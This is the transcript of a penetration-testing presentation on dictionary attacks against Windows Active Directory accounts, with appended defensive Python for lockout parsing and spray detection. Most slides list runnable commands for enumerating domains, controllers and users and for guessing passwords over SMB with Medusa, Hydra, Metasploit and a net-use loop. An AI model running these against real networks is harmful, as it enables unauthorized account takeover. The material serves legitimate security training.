Introduction to Windows Dictionary Attacks

Author: Scott Sutherland

Description

In this presentation I will cover the basics of how to perform dictionary attacks against Windows Active Directory accounts safely. Below is an overview of the steps that will be covered:

• Identify domains

• Enumerate domain controllers

• Enumerate users from domain controllers

• Enumerate password policy from domain controllers

• Perform dictionary attack

More security blogs by the authors can be found @ https://www.netspi.com/blog/

Transcript of Introduction to Windows Dictionary Attacks

Page 1: Introduction to Windows Dictionary Attacks

Introduction to Windows Dictionary Attacks

Author: Scott Sutherland

Page 2: Introduction to Windows Dictionary Attacks

Who am I?

Scott Sutherland

• Principal Security Consultant @ NetSPI

• Over 10 years of consulting experience

• Security researcher: blogs, white papers, tools, etc.

Page 3: Introduction to Windows Dictionary Attacks

Presentation Goals

• Identify the value of dictionary attacks

• Provide new penetration testers with a safe approach to Windows dictionary attacks

• Provide security professionals with questions they should be asking their contractors

Page 4: Introduction to Windows Dictionary Attacks

Before we begin…

Dictionary Attack

Brute Force Attack

Page 5: Introduction to Windows Dictionary Attacks

Why dictionary attacks?

What are the goals?

• Identify accounts configured with weak or default passwords – “It’s human nature”

• Use accounts as entry points during penetration tests

What’s the impact?

• Unauthorized access to critical:

‒ Systems

‒ Applications

‒ Data

• User impersonation

Page 6: Introduction to Windows Dictionary Attacks

Are There Alternatives?

Yes.

Approaches typically include:

• Cracking password hashes offline with:

‒ Pre-computed hash libraries like Rainbow Tables

‒ Brute force and dictionary techniques using tools like Hashcat and John the Ripper

• Dumping clear-text passwords from interactive sessions with Mimikatz

Page 7: Introduction to Windows Dictionary Attacks

Dictionary Attacks: Process Overview

Windows Dictionary Attack Process

1. Identify domains

2. Enumerate domain controllers

3. Enumerate domain users

4. Enumerate domain lockout policy

5. Create a dictionary

6. Perform Attack

Page 8: Introduction to Windows Dictionary Attacks

Identify Domains: Methods

Unauthenticated Methods

• DHCP Information

• NetBIOS Queries

• DNS Queries

• Sniffing Network Traffic

• Review RDP drop down lists

Authenticated Methods

• Review the output of the SET command for “USERDNSDOMAIN”

• Review the registry for the default domain

Page 9: Introduction to Windows Dictionary Attacks

Identify Domains: Tools

Method [Auth]: Tools

DHCP Info [No]: IPCONFIG

NetBIOS Queries [No]: NBTSTAT -A <IP>

DNS Queries [No]:
  nmap -sL <IP Range> -oA output_rnds
  ./reverseraider -r <IP Range>
  ./dnswalk victim.com
  perl fierce.pl -dns <domainname> -threads 5 -file <domainname>-dns.output

Sniffing [No]:
  Wireshark (GUI) + filter for browser traffic
  Network Monitor (GUI)
  Etherape (GUI)

RDP Drop Down [No]: nmap -sS -PN -p3389 <IP Range>, then visit with an RDP client

Page 10: Introduction to Windows Dictionary Attacks

Enumerate DCs: Methods

Unauthenticated Methods

• DNS Queries

• RPC Queries

• Port Scanning

• NetBIOS Scanning

Authenticated Methods

• NET GROUP commands

• LDAP Queries

Page 11: Introduction to Windows Dictionary Attacks

Enumerate DCs: Tools

Method [Auth]: Tools

DNS Queries [No]: NSLOOKUP -type=SRV _ldap._tcp.<domain>

RPC Queries [No]:
  NLTEST /DCLIST <domain>
  FindPDC <domain> <request count>

Port Scanning [No]: NMAP -sS -p389,636 -PN <IP Range>

NetBIOS Scanning [No]: FOR /F "tokens=*" %i in ('type ips.txt') do NBTSTAT -A %i

NET GROUP Command [Yes]: Net group "Domain Controllers" /domain

LDAP Queries [Yes & No]:
  LDAP Administrator (GUI Tool)
  Hyena (GUI Tool)
  adfind -b -sc dcdmp <domain> -gc | grep -i ">name:" | gawk -F " " "{print $2}" | sort | uniq

Page 12: Introduction to Windows Dictionary Attacks

Enumerate Domain Users: Methods

Unauthenticated Methods

• RPC Queries

• SID Brute Forcing

• SNMP Queries

• LDAP Queries

• Sharepoint Fuzzing

Authenticated Methods

• NET USER command

• WMI commands

Page 13: Introduction to Windows Dictionary Attacks

Enumerate Domain Users: Tools 1

Method [Auth]: Tools

RPC Endpoints [Yes & No]:
  dumpsec.exe /computer=\\<IP> /rpt=usersonly /saveas=csv /outfile=domain_users.txt
  enum -N <ip>
  enum -U <ip>

SID Brute Forcing [Yes & No]:
  ruby c:\metasploit\msf3\msfcli auxiliary/scanner/smb/smb_lookupsid SMBDomain=. MaxRID=10000 RHOSTS=<IP Address> E > domain_users.txt
  Getacct (GUI)

SNMP Queries [Yes & No]:
  ruby c:\metasploit\msf3\msfcli auxiliary/scanner/snmp/snmp_enumusers SMBDomain=. RHOSTS=<IP Address> E
  Mibbrowser (GUI)
  SNMP Walk

Page 14: Introduction to Windows Dictionary Attacks

Enumerate Domain Users: Tools 2

Method [Auth]: Tools

LDAP Queries [Yes & No]:
  adfind -b DC=<victim>,DC=<com> -f "objectcategory=user" -gc | grep -i "sAMAccountName:" | gawk -F ":" "{print $2}" | gawk -F " " "{print $1}" | sort > domain_users.txt

Sharepoint Fuzzing [Yes & No]: Fuzz parameters with BURP to enumerate domain users. Example URL below:
  https://www.[website].com/sites/[sitename]/_layouts/userdisp.aspx?Force=True&ID=[2]

NET USERS Command [Yes]: Net users /domain > domain_users.txt

WMI Commands [Yes]: wmic /user:<user> /password:<password> /node:<IP address> domain_users.txt

Page 15: Introduction to Windows Dictionary Attacks

Get Domain Lockout Policy: Methods

Unauthenticated Methods

• RPC Endpoints

Authenticated Methods

• NET ACCOUNTS command

What does it all mean?

• Threshold, duration, and window

Lockout threshold: 5

Lockout duration: 15

Lockout observation window : 15

Page 16: Introduction to Windows Dictionary Attacks

Get Domain Lockout Policy: Tools

Method [Auth]: Tools

RPC Queries [Yes & No]:
  Enum -P <IP Address>
  dumpsec.exe /computer=\\<IP> /rpt=policy /saveas=csv /outfile=domain_policy.txt

NET ACCOUNTS Command [Yes]: NET ACCOUNTS
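As an added illustration that is not part of the original slides, the Python below parses the NET ACCOUNTS output format into the three values the "What does it all mean?" slide lists and spells out what each setting implies for password guessing. The sample output is constructed (it reuses the slide's threshold 5, duration 15, window 15), and the function names are my own.

```python
import re

# Constructed sample of NET ACCOUNTS output, using the values shown on the
# "What does it all mean?" slide (threshold 5, duration 15, window 15).
SAMPLE_NET_ACCOUNTS = """\
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          1
Maximum password age (days):                          42
Minimum password length:                              7
Length of password history maintained:                24
Lockout threshold:                                    5
Lockout duration (minutes):                           15
Lockout observation window (minutes):                 15
Computer role:                                        WORKSTATION
"""

FIELDS = {
    "threshold": r"^Lockout threshold:\s+(\S+)",
    "duration": r"^Lockout duration \(minutes\):\s+(\S+)",
    "window": r"^Lockout observation window \(minutes\):\s+(\S+)",
}


def parse_lockout_policy(text):
    """Return threshold/duration/window as ints; 'Never' is stored as 0."""
    policy = {}
    for name, pattern in FIELDS.items():
        match = re.search(pattern, text, re.MULTILINE)
        if not match:
            raise ValueError(f"NET ACCOUNTS output lacks field: {name}")
        value = match.group(1)
        policy[name] = 0 if value.lower() == "never" else int(value)
    return policy


def assess_lockout_policy(policy):
    """Spell out what the three numbers mean for password guessing."""
    t, d, w = policy["threshold"], policy["duration"], policy["window"]
    if t == 0:
        return {"locks_out": False, "failures_tolerated_per_window": None,
                "note": "threshold is Never: bad-password guessing never locks an account"}
    # The bad-password counter resets `w` minutes after the last failure, so
    # an account absorbs t-1 failures per window without locking.
    unlock = ("stays locked until an administrator unlocks it" if d == 0
              else f"unlocks automatically after {d} minutes")
    return {"locks_out": True, "failures_tolerated_per_window": t - 1,
            "window_minutes": w, "note": f"locked account {unlock}"}
```

A threshold of Never (0) is the finding a security professional should be asking about first: with it, the "respect the lockout policy" rule on the next slides has nothing to respect, and only logging catches the guessing.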

Page 17: Introduction to Windows Dictionary Attacks

Create a Dictionary: Methods

Classics Still Work

• Blank

• Username as password

• password

Common Formulas = Most Effective

• <Password><Number>

• <Companyname><Number>

• <Season><Year>

• <Sports team><Number>

Popular Dictionaries

• Metasploit dictionaries

• RockYou

• FuzzDB

• John the Ripper

Page 18: Introduction to Windows Dictionary Attacks

Create a Dictionary: Tools

Dictionary: URLs / Lists

Classics:
  Blank password
  Username as password
  password as password

Formulas:
  <Password><Number>
  <Companyname><Number>
  <Season><Year>
  <Sports team><Number>

Your Brain! Think of keywords relative to the target company / geographic location and you'll get more out of your dictionary attacks!

Rockyou: http://www.skullsecurity.org/wiki/index.php/Passwords

FuzzDB: http://code.google.com/p/fuzzdb/ and https://github.com/rustyrobot/fuzzdb

John the Ripper: http://www.openwall.com/wordlists/

Page 19: Introduction to Windows Dictionary Attacks

Perform Dictionary Attack: Rules

The Rule to Live By:

Respect the lockout policy

• General idea = Attempt a few passwords for all of the domain users each round, not 1,000 passwords against one user

• Subtract 2 attempts from the lockout policy. Example: Lockout=5, Attempts=3

• Wait 5 to 10 minutes beyond the observation window
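The "few passwords for all users each round" pattern above is exactly what per-account lockout never catches and what a defender's password-spray detection looks for. As an added, defender-side example that is not from the original presentation, the Python below runs that logic over constructed failed-logon records (timestamp, source address, target account: the fields you would pull from Security event 4625); the default threshold and window match the slide's policy, and the function name is my own.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed failed-logon records (timestamp, source address, target account),
# the fields a defender would pull from Security event 4625. Not real log data.
SAMPLE_EVENTS = [
    ("2015-03-02 09:00:01", "10.0.0.50", "alice"),
    ("2015-03-02 09:00:02", "10.0.0.50", "bob"),
    ("2015-03-02 09:00:03", "10.0.0.50", "carol"),
    ("2015-03-02 09:00:04", "10.0.0.50", "dave"),
    ("2015-03-02 09:00:05", "10.0.0.50", "erin"),
    ("2015-03-02 09:00:06", "10.0.0.50", "frank"),
    ("2015-03-02 09:05:00", "10.0.0.50", "alice"),   # second password, same round
    ("2015-03-02 09:05:01", "10.0.0.50", "bob"),
    ("2015-03-02 09:30:00", "10.0.0.7", "alice"),    # one user mistyping a password
    ("2015-03-02 09:30:40", "10.0.0.7", "alice"),
]


def detect_password_spray(events, window_minutes=15, min_accounts=5,
                          lockout_threshold=5):
    """Flag a source that fails against many distinct accounts inside one
    observation window while keeping every account below the lockout threshold,
    i.e. the 'few passwords for all users per round' pattern that per-account
    lockout alone never catches. Returns one alert per offending source."""
    by_source = defaultdict(list)
    for ts, src, user in events:
        by_source[src].append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), user))

    window = timedelta(minutes=window_minutes)
    alerts = []
    for src, rows in by_source.items():
        rows.sort()
        start = 0
        for end, (t_end, _) in enumerate(rows):
            # Slide the window so rows[start:end+1] spans at most window_minutes.
            while t_end - rows[start][0] > window:
                start += 1
            per_account = defaultdict(int)
            for _, user in rows[start:end + 1]:
                per_account[user] += 1
            if (len(per_account) >= min_accounts
                    and max(per_account.values()) < lockout_threshold):
                alerts.append({"source": src, "accounts": len(per_account),
                               "max_failures_per_account": max(per_account.values()),
                               "window_start": rows[start][0].isoformat()})
                break
    return alerts
```

Rounds spaced 5 to 10 minutes beyond the observation window, as the slide recommends, fall outside a single 15-minute window, so a production rule should also correlate over hours and flag sources that touch many accounts with only one or two failures each.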

Page 20: Introduction to Windows Dictionary Attacks

Perform Dictionary Attack: Tools

Tool [OS]: Command

Medusa [Linux]: medusa -H hosts.txt -U users.txt -P passwords.txt -T 20 -t 10 -L -F -M smbnt

Bruter [Windows]: Easy-to-use GUI; no CLI that I know of.

Metasploit smb_login [Windows and Linux]: ruby c:\metasploit\msf3\msfcli auxiliary/scanner/smb/smb_login THREADS=5 BLANK_PASSWORDS=true USER_AS_PASS=true PASS_FILE=c:\\passwords.txt USER_FILE=c:\\allusers.txt SMBDomain=. RHOSTS=192.168.1.1 E

Hydra [Windows and Linux]: hydra.exe -L users.txt -P passwords.txt -o credentials.txt <ip> smb

Batch Script [Windows]: FOR /F "tokens=*" %a in ('type passwords.txt') do net use \\<ip>\IPC$ /user:<user> %a

Page 21: Introduction to Windows Dictionary Attacks

Conclusions

• There is more than one way to do everything!

• Enumerate all available options

• It’s easy to lock out accounts – respect the password policy

• Always ask contractors what their approach is to reduce the chance of account lockouts during penetration tests